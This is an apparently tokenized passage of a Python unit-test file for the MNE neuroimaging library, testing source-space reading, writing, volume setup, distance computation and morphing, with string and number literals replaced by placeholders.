<s> from __future__ import print_function <EOL> import os <EOL> import os . path as op <EOL> from nose . tools import assert_true , assert_raises <EOL> from nose . plugins . skip import SkipTest <EOL> import numpy as np <EOL> from numpy . testing import assert_array_equal , assert_allclose , assert_equal <EOL> import warnings <EOL> from mne . datasets import testing <EOL> from mne import ( read_source_spaces , vertex_to_mni , write_source_spaces , <EOL> setup_source_space , setup_volume_source_space , <EOL> add_source_space_distances , read_bem_surfaces , <EOL> morph_source_spaces , SourceEstimate ) <EOL> from mne . utils import ( _TempDir , requires_fs_or_nibabel , requires_nibabel , <EOL> requires_freesurfer , run_subprocess , slow_test , <EOL> requires_mne , requires_version , run_tests_if_main ) <EOL> from mne . surface import _accumulate_normals , _triangle_neighbors <EOL> from mne . source_space import _get_mri_header , _get_mgz_header <EOL> from mne . externals . six . moves import zip <EOL> from mne . source_space import ( get_volume_labels_from_aseg , SourceSpaces , <EOL> _compare_source_spaces ) <EOL> from mne . tests . common import assert_naming <EOL> from mne . io . constants import FIFF <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> data_path = testing . data_path ( download = False ) <EOL> subjects_dir = op . join ( data_path , '<STR_LIT>' ) <EOL> fname_mri = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname_vol = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> fname_bem = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> fname_fs = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname_morph = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> base_dir = op . join ( op . 
dirname ( __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' ) <EOL> fname_small = op . join ( base_dir , '<STR_LIT>' ) <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_nibabel ( vox2ras_tkr = True ) <EOL> def test_mgz_header ( ) : <EOL> """<STR_LIT>""" <EOL> header = _get_mgz_header ( fname_mri ) <EOL> mri_hdr = _get_mri_header ( fname_mri ) <EOL> assert_allclose ( mri_hdr . get_data_shape ( ) , header [ '<STR_LIT>' ] ) <EOL> assert_allclose ( mri_hdr . get_vox2ras_tkr ( ) , header [ '<STR_LIT>' ] ) <EOL> assert_allclose ( mri_hdr . get_ras2vox ( ) , header [ '<STR_LIT>' ] ) <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_patch_info ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname_small ) <EOL> src_new = read_source_spaces ( fname_small ) <EOL> for s in src_new : <EOL> s [ '<STR_LIT>' ] = None <EOL> s [ '<STR_LIT>' ] = None <EOL> s [ '<STR_LIT>' ] = None <EOL> try : <EOL> add_source_space_distances ( src_new , dist_limit = <NUM_LIT> ) <EOL> except RuntimeError : <EOL> pass <EOL> else : <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> add_source_space_distances ( src_new ) <EOL> for s1 , s2 in zip ( src , src_new ) : <EOL> assert_array_equal ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] ) <EOL> assert_allclose ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] , atol = <NUM_LIT> ) <EOL> assert_equal ( len ( s1 [ '<STR_LIT>' ] ) , len ( s2 [ '<STR_LIT>' ] ) ) <EOL> for p1 , p2 in zip ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] ) : <EOL> assert_array_equal ( p1 , p2 ) <EOL> @ testing . 
requires_testing_data <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_source_space_distances_limited ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> src_new = read_source_spaces ( fname ) <EOL> del src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> n_do = <NUM_LIT:200> <EOL> src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> try : <EOL> add_source_space_distances ( src_new , dist_limit = <NUM_LIT> ) <EOL> except RuntimeError : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> write_source_spaces ( out_name , src_new ) <EOL> src_new = read_source_spaces ( out_name ) <EOL> for so , sn in zip ( src , src_new ) : <EOL> assert_array_equal ( so [ '<STR_LIT>' ] , np . array ( [ - <NUM_LIT> ] , np . float32 ) ) <EOL> assert_array_equal ( sn [ '<STR_LIT>' ] , np . array ( [ <NUM_LIT> ] , np . float32 ) ) <EOL> do = so [ '<STR_LIT>' ] <EOL> dn = sn [ '<STR_LIT>' ] <EOL> do . data [ do . data > <NUM_LIT> ] = <NUM_LIT:0> <EOL> do . eliminate_zeros ( ) <EOL> assert_true ( np . sum ( do . data < <NUM_LIT> ) > <NUM_LIT> ) <EOL> d = ( do - dn ) [ : sn [ '<STR_LIT>' ] [ n_do - <NUM_LIT:1> ] ] [ : , : sn [ '<STR_LIT>' ] [ n_do - <NUM_LIT:1> ] ] <EOL> assert_allclose ( np . zeros_like ( d . data ) , d . data , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> @ slow_test <EOL> @ testing . 
requires_testing_data <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_source_space_distances ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> src_new = read_source_spaces ( fname ) <EOL> del src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> n_do = <NUM_LIT> <EOL> src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> n_jobs = <NUM_LIT:2> <EOL> assert_true ( n_do % n_jobs != <NUM_LIT:0> ) <EOL> add_source_space_distances ( src_new , n_jobs = n_jobs ) <EOL> write_source_spaces ( out_name , src_new ) <EOL> src_new = read_source_spaces ( out_name ) <EOL> for so , sn in zip ( src , src_new ) : <EOL> v = so [ '<STR_LIT>' ] [ : n_do ] <EOL> assert_array_equal ( so [ '<STR_LIT>' ] , np . array ( [ - <NUM_LIT> ] , np . float32 ) ) <EOL> assert_array_equal ( sn [ '<STR_LIT>' ] , np . array ( [ np . inf ] , np . float32 ) ) <EOL> do = so [ '<STR_LIT>' ] <EOL> dn = sn [ '<STR_LIT>' ] <EOL> ds = list ( ) <EOL> for d in [ do , dn ] : <EOL> d . data [ d . data > <NUM_LIT> ] = <NUM_LIT:0> <EOL> d = d [ v ] [ : , v ] <EOL> d . eliminate_zeros ( ) <EOL> ds . append ( d ) <EOL> assert_true ( np . sum ( ds [ <NUM_LIT:0> ] . data < <NUM_LIT> ) > <NUM_LIT:10> ) <EOL> d = ds [ <NUM_LIT:0> ] - ds [ <NUM_LIT:1> ] <EOL> assert_allclose ( np . zeros_like ( d . data ) , d . data , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_mne <EOL> def test_discrete_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> v = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> try : <EOL> temp_pos = op . 
join ( tempdir , '<STR_LIT>' ) <EOL> np . savetxt ( temp_pos , np . c_ [ src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] ] ) <EOL> run_subprocess ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_pos , '<STR_LIT>' , temp_name ] ) <EOL> src_c = read_source_spaces ( temp_name ) <EOL> pos_dict = dict ( rr = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , nn = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] ) <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , None , <EOL> pos = pos_dict , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src_c , src_new , mode = '<STR_LIT>' ) <EOL> assert_allclose ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> assert_allclose ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> write_source_spaces ( temp_name , src_c ) <EOL> src_c2 = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src_c , src_c2 ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , <EOL> pos = pos_dict , mri = fname_mri ) <EOL> finally : <EOL> if op . isfile ( temp_name ) : <EOL> os . remove ( temp_name ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_volume_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname_vol ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> surf = read_bem_surfaces ( fname_bem , s_id = FIFF . 
FIFFV_BEM_SURF_ID_BRAIN ) <EOL> surf [ '<STR_LIT>' ] *= <NUM_LIT> <EOL> for bem , surf in zip ( ( fname_bem , None ) , ( None , surf ) ) : <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , temp_name , pos = <NUM_LIT> , <EOL> bem = bem , surface = surf , <EOL> mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> del src_new <EOL> src_new = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> assert_raises ( IOError , setup_volume_source_space , '<STR_LIT>' , temp_name , <EOL> pos = <NUM_LIT> , bem = None , surface = '<STR_LIT:foo>' , <EOL> mri = fname_mri , subjects_dir = subjects_dir ) <EOL> @ testing . requires_testing_data <EOL> @ requires_mne <EOL> def test_other_volume_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> run_subprocess ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_name , <EOL> '<STR_LIT>' , fname_mri ] ) <EOL> src = read_source_spaces ( temp_name ) <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , temp_name , pos = <NUM_LIT> , <EOL> mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> del src <EOL> del src_new <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , temp_name , <EOL> pos = <NUM_LIT> , sphere = [ <NUM_LIT:1.> , <NUM_LIT:1.> ] , mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> run_subprocess ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_name ] ) <EOL> assert_raises ( ValueError , read_source_spaces , temp_name ) <EOL> @ testing . 
requires_testing_data <EOL> def test_triangle_neighbors ( ) : <EOL> """<STR_LIT>""" <EOL> this = read_source_spaces ( fname ) [ <NUM_LIT:0> ] <EOL> this [ '<STR_LIT>' ] = [ list ( ) for _ in range ( this [ '<STR_LIT>' ] ) ] <EOL> for p in range ( this [ '<STR_LIT>' ] ) : <EOL> verts = this [ '<STR_LIT>' ] [ p ] <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:0> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:1> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:2> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] = [ np . array ( nb , int ) for nb in this [ '<STR_LIT>' ] ] <EOL> neighbor_tri = _triangle_neighbors ( this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] ) <EOL> assert_true ( np . array_equal ( nt1 , nt2 ) <EOL> for nt1 , nt2 in zip ( neighbor_tri , this [ '<STR_LIT>' ] ) ) <EOL> def test_accumulate_normals ( ) : <EOL> """<STR_LIT>""" <EOL> n_pts = int ( <NUM_LIT> ) <EOL> n_tris = int ( <NUM_LIT> ) <EOL> tris = ( rng . rand ( n_tris , <NUM_LIT:1> ) * ( n_pts - <NUM_LIT:2> ) ) . astype ( int ) <EOL> tris = np . c_ [ tris , tris + <NUM_LIT:1> , tris + <NUM_LIT:2> ] <EOL> tri_nn = rng . rand ( n_tris , <NUM_LIT:3> ) <EOL> this = dict ( tris = tris , np = n_pts , ntri = n_tris , tri_nn = tri_nn ) <EOL> this [ '<STR_LIT>' ] = np . zeros ( ( this [ '<STR_LIT>' ] , <NUM_LIT:3> ) ) <EOL> for p in range ( this [ '<STR_LIT>' ] ) : <EOL> verts = this [ '<STR_LIT>' ] [ p ] <EOL> this [ '<STR_LIT>' ] [ verts , : ] += this [ '<STR_LIT>' ] [ p , : ] <EOL> nn = _accumulate_normals ( this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] ) <EOL> assert_allclose ( nn , this [ '<STR_LIT>' ] , rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_setup_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> fname_ico = op . 
join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( IOError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , add_dist = False ) <EOL> src = read_source_spaces ( fname_ico ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , temp_name , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , add_dist = False , <EOL> overwrite = True ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> assert_array_equal ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , np . arange ( <NUM_LIT> ) ) <EOL> assert_array_equal ( src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , np . arange ( <NUM_LIT> ) ) <EOL> src = read_source_spaces ( fname ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> warnings . 
simplefilter ( '<STR_LIT>' ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , temp_name , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , <EOL> overwrite = True , add_dist = False ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' , nearest = False ) <EOL> src_new = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' , nearest = False ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , None , spacing = '<STR_LIT:all>' , <EOL> subjects_dir = subjects_dir , add_dist = False ) <EOL> assert_true ( src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == len ( src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> assert_true ( src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] == len ( src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) ) <EOL> assert_raises ( RuntimeError , setup_source_space , '<STR_LIT>' , None , <EOL> spacing = '<STR_LIT>' , subjects_dir = subjects_dir , add_dist = False ) <EOL> @ testing . requires_testing_data <EOL> def test_read_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname , patch_stats = True ) <EOL> lh_points = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> lh_faces = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> lh_use_faces = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rh_points = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> rh_faces = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> rh_use_faces = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> assert_true ( lh_faces . min ( ) == <NUM_LIT:0> ) <EOL> assert_true ( lh_faces . max ( ) == lh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( lh_use_faces . min ( ) >= <NUM_LIT:0> ) <EOL> assert_true ( lh_use_faces . max ( ) <= lh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( rh_faces . min ( ) == <NUM_LIT:0> ) <EOL> assert_true ( rh_faces . max ( ) == rh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( rh_use_faces . min ( ) >= <NUM_LIT:0> ) <EOL> assert_true ( rh_use_faces . 
max ( ) <= rh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_write_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src0 = read_source_spaces ( fname , patch_stats = False ) <EOL> write_source_spaces ( op . join ( tempdir , '<STR_LIT>' ) , src0 ) <EOL> src1 = read_source_spaces ( op . join ( tempdir , '<STR_LIT>' ) , <EOL> patch_stats = False ) <EOL> _compare_source_spaces ( src0 , src1 ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> src_badname = op . join ( tempdir , '<STR_LIT>' ) <EOL> write_source_spaces ( src_badname , src0 ) <EOL> read_source_spaces ( src_badname ) <EOL> assert_naming ( w , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_fs_or_nibabel <EOL> def test_vertex_to_mni ( ) : <EOL> """<STR_LIT>""" <EOL> vertices = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> coords = np . array ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> hemis = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> coords_2 = vertex_to_mni ( vertices , hemis , '<STR_LIT>' , subjects_dir ) <EOL> assert_allclose ( coords , coords_2 , atol = <NUM_LIT:1.0> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_vertex_to_mni_fs_nibabel ( ) : <EOL> """<STR_LIT>""" <EOL> n_check = <NUM_LIT:1000> <EOL> subject = '<STR_LIT>' <EOL> vertices = rng . randint ( <NUM_LIT:0> , <NUM_LIT> , n_check ) <EOL> hemis = rng . 
randint ( <NUM_LIT:0> , <NUM_LIT:1> , n_check ) <EOL> coords = vertex_to_mni ( vertices , hemis , subject , subjects_dir , <EOL> '<STR_LIT>' ) <EOL> coords_2 = vertex_to_mni ( vertices , hemis , subject , subjects_dir , <EOL> '<STR_LIT>' ) <EOL> assert_allclose ( coords , coords_2 , atol = <NUM_LIT:0.1> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_get_volume_label_names ( ) : <EOL> """<STR_LIT>""" <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> assert_equal ( label_names . count ( '<STR_LIT>' ) , <NUM_LIT:1> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_source_space_from_label ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> volume_label = label_names [ int ( np . random . rand ( ) * len ( label_names ) ) ] <EOL> pos = dict ( ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , pos = pos , <EOL> volume_label = volume_label , mri = aseg_fname ) <EOL> assert_raises ( RuntimeError , setup_volume_source_space , '<STR_LIT>' , mri = None , <EOL> volume_label = volume_label ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , <EOL> volume_label = '<STR_LIT>' , mri = aseg_fname ) <EOL> src = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> volume_label = volume_label , mri = aseg_fname , <EOL> add_interpolator = False ) <EOL> assert_equal ( volume_label , src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> out_name = op . 
join ( tempdir , '<STR_LIT>' ) <EOL> write_source_spaces ( out_name , src ) <EOL> src_from_file = read_source_spaces ( out_name ) <EOL> _compare_source_spaces ( src , src_from_file , mode = '<STR_LIT>' ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_combine_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> volume_labels = [ label_names [ int ( np . random . rand ( ) * len ( label_names ) ) ] <EOL> for ii in range ( <NUM_LIT:2> ) ] <EOL> srf = read_source_spaces ( fname , patch_stats = False ) <EOL> vol = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> volume_label = volume_labels [ <NUM_LIT:0> ] , <EOL> mri = aseg_fname , add_interpolator = False ) <EOL> rr = rng . randint ( <NUM_LIT:0> , <NUM_LIT:20> , ( <NUM_LIT:100> , <NUM_LIT:3> ) ) * <NUM_LIT> <EOL> nn = np . zeros ( rr . shape ) <EOL> nn [ : , - <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> pos = { '<STR_LIT>' : rr , '<STR_LIT>' : nn } <EOL> disc = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> pos = pos , verbose = '<STR_LIT:error>' ) <EOL> src = srf + vol + disc <EOL> assert_equal ( type ( src ) , SourceSpaces ) <EOL> assert_equal ( len ( src ) , <NUM_LIT:4> ) <EOL> src_out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> src . save ( src_out_name ) <EOL> src_from_file = read_source_spaces ( src_out_name ) <EOL> _compare_source_spaces ( src , src_from_file , mode = '<STR_LIT>' ) <EOL> coord_frames = np . array ( [ s [ '<STR_LIT>' ] for s in src ] ) <EOL> assert_true ( ( coord_frames == FIFF . FIFFV_COORD_MRI ) . all ( ) ) <EOL> image_fname = op . join ( tempdir , '<STR_LIT>' ) <EOL> assert_raises ( ValueError , srf . export_volume , image_fname , verbose = '<STR_LIT:error>' ) <EOL> disc2 = disc . 
copy ( ) <EOL> disc2 [ <NUM_LIT:0> ] [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> src_unrecognized = src + disc2 <EOL> assert_raises ( ValueError , src_unrecognized . export_volume , image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> bad_image_fname = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> assert_raises ( ValueError , src . export_volume , bad_image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> disc3 = disc . copy ( ) <EOL> disc3 [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> src_mixed_coord = src + disc3 <EOL> assert_raises ( ValueError , src_mixed_coord . export_volume , image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> @ testing . requires_testing_data <EOL> def test_morph_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname_fs ) <EOL> src_morph = read_source_spaces ( fname_morph ) <EOL> src_morph_py = morph_source_spaces ( src , '<STR_LIT>' , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src_morph , src_morph_py , mode = '<STR_LIT>' ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_morphed_source_space_return ( ) : <EOL> """<STR_LIT>""" <EOL> data = rng . randn ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> tmin , tstep = <NUM_LIT:0> , <NUM_LIT:1.> <EOL> src_fs = read_source_spaces ( fname_fs ) <EOL> stc_fs = SourceEstimate ( data , [ s [ '<STR_LIT>' ] for s in src_fs ] , <EOL> tmin , tstep , '<STR_LIT>' ) <EOL> src_morph = morph_source_spaces ( src_fs , '<STR_LIT>' , <EOL> subjects_dir = subjects_dir ) <EOL> stc_morph = stc_fs . morph ( '<STR_LIT>' , [ s [ '<STR_LIT>' ] for s in src_morph ] , <EOL> smooth = <NUM_LIT:1> , subjects_dir = subjects_dir ) <EOL> keeps = [ np . sort ( rng . permutation ( np . arange ( len ( v ) ) ) [ : len ( v ) - <NUM_LIT:10> ] ) <EOL> for v in stc_morph . vertices ] <EOL> stc_morph = SourceEstimate ( <EOL> np . concatenate ( [ stc_morph . lh_data [ keeps [ <NUM_LIT:0> ] ] , <EOL> stc_morph . 
rh_data [ keeps [ <NUM_LIT:1> ] ] ] ) , <EOL> [ v [ k ] for v , k in zip ( stc_morph . vertices , keeps ) ] , tmin , tstep , <EOL> '<STR_LIT>' ) <EOL> stc_morph_return = stc_morph . to_original_src ( <EOL> src_fs , subjects_dir = subjects_dir ) <EOL> stc_morph_morph = stc_morph . morph ( '<STR_LIT>' , stc_morph_return . vertices , <EOL> smooth = <NUM_LIT:1> , <EOL> subjects_dir = subjects_dir ) <EOL> assert_equal ( stc_morph_return . subject , stc_morph_morph . subject ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> assert_array_equal ( stc_morph_return . vertices [ ii ] , <EOL> stc_morph_morph . vertices [ ii ] ) <EOL> corr = np . corrcoef ( stc_morph_return . data [ : , <NUM_LIT:0> ] , <EOL> stc_morph_morph . data [ : , <NUM_LIT:0> ] ) [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert_true ( corr > <NUM_LIT> , corr ) <EOL> stc_morph . subject = None <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subject_orig = '<STR_LIT>' , subjects_dir = subjects_dir ) <EOL> stc_morph . subject = '<STR_LIT>' <EOL> del src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subjects_dir = subjects_dir ) <EOL> src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subject_orig = '<STR_LIT:foo>' , subjects_dir = subjects_dir ) <EOL> src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> src = read_source_spaces ( fname ) <EOL> assert_raises ( RuntimeError , stc_morph . to_original_src , 